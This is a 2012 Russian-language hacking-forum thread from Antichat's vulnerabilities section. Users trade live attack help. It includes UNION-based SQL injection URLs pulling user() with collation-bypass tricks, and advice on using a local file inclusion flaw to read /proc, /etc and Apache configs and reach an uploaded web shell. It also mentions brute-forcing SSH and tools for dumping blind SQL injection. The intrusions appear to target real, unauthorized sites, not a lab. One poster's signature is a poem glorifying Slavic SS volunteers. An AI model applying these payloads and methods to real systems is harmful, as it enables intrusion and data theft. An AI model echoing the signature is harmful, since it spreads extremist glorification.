HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.06.2012, 13:26
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

to briz

rsaUnDumper, sqlmap, toolza

Да много еще, Вы, молодой человек, плохо искали!
 
Ответить с цитированием

  #2  
Старый 17.06.2012, 13:32
RuDefc0n
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами: 7339286

Репутация: 0
По умолчанию

Столкнулся с проблемой:

1) Есть 2 сервера, которые как-то слинкованы между собой - т.е. с одного можно читать файлы другого и наоборот.

2) Найдена функция позволяющая читать содержимое файла и вот хз, что это. Скорее всего релинковка через htaccess

3) Добрался до конфигов, кроме httpd, логи же вообще читать не позволяет, хотя установил место-положение.

4) Пути до 2 сервера не могу найти ну вообще никак - логический перебор названий ни к чему не привел, при этом раскрытия путей точно нет. Читать из веба файлы он отказывается, что делать?

5) Файлы судя по всему хранятся не по тому адресу, что показываются - как результат напрямую запросить залитый шелл не могу, и логический перебор опять же не помог.

Что можно сделать? Куда копать? Имеет ли смысл вообще раскручивать этот способ или браться за поиск других ошибок?

PS /proc/sys/ и етк спокойно читаются.

PS это дебиан -_-
 
Ответить с цитированием

  #3  
Старый 17.06.2012, 13:51
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от briz  
Подскажите, пожалуйста, нубу.. Каким образом дампится блинд sql скуль? знаю количество столбцов, имя бд, таблицы и столбцов.. Попробовал несколько паблик прог - не катит..
посимвольно,через вывод ошибок...
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #4  
Старый 17.06.2012, 20:58
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами: 8200406

Репутация: 38
По умолчанию

http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+

Цитата:
Сообщение от None  
Нормальный вывод
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+

Цитата:
Сообщение от None  
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как боротся?
 
Ответить с цитированием

  #5  
Старый 17.06.2012, 22:40
RuDefc0n
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами: 7339286

Репутация: 0
По умолчанию

Собственно интересно как можно оказаться воздействие на переменные окружения при:

APACHE_PID_FILE=/var/run/apache2.pid

APACHE_RUN_USER=www-data

PATH=/usr/local/bin:/usr/bin:/bin

PWD=/

APACHE_RUN_GROUP=www-data

LANG=C

SHLVL=1

_=/usr/sbin/apache2
 
Ответить с цитированием

  #6  
Старый 17.06.2012, 22:46
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Pirotexnik

aes_decrypt(aes_encrypt(user()))

RuDefc0n

там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ
 
Ответить с цитированием

  #7  
Старый 17.06.2012, 22:55
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Pirotexnik  
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+
Как боротся?
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,unhex(hex(user()))+--+
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #8  
Старый 17.06.2012, 23:50
RuDefc0n
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами: 7339286

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Pirotexnik
aes_decrypt(aes_encrypt(user()))
RuDefc0n
там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ
По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.

Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.
 
Ответить с цитированием

  #9  
Старый 18.06.2012, 00:41
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от RuDefc0n  
По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.
Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.
по информации из environ видно что там наверняка дебиан бейсд дистро какой то (debian/ubuntu), пробовал читать /etc/apache2/conf/apache2.conf ? там спалишь пути к htdocs, а дальше читаем скрипты..
 
Ответить с цитированием

  #10  
Старый 18.06.2012, 01:17
Pirotexnik
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами: 8200406

Репутация: 38
По умолчанию

Что-то я не врубился О_0

-1110+union+select+1,2,3,4,aes_decrypt(aes_encrypt( user()))+--+

Цитата:
Сообщение от None  
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ')) -- order by rus' at line 1
-1110+union+select+1,2,3,4,unhex(hex(user()))+--+

Цитата:
Сообщение от None  
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '(hex(user())) -- order by rus' at line 1
Что за?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...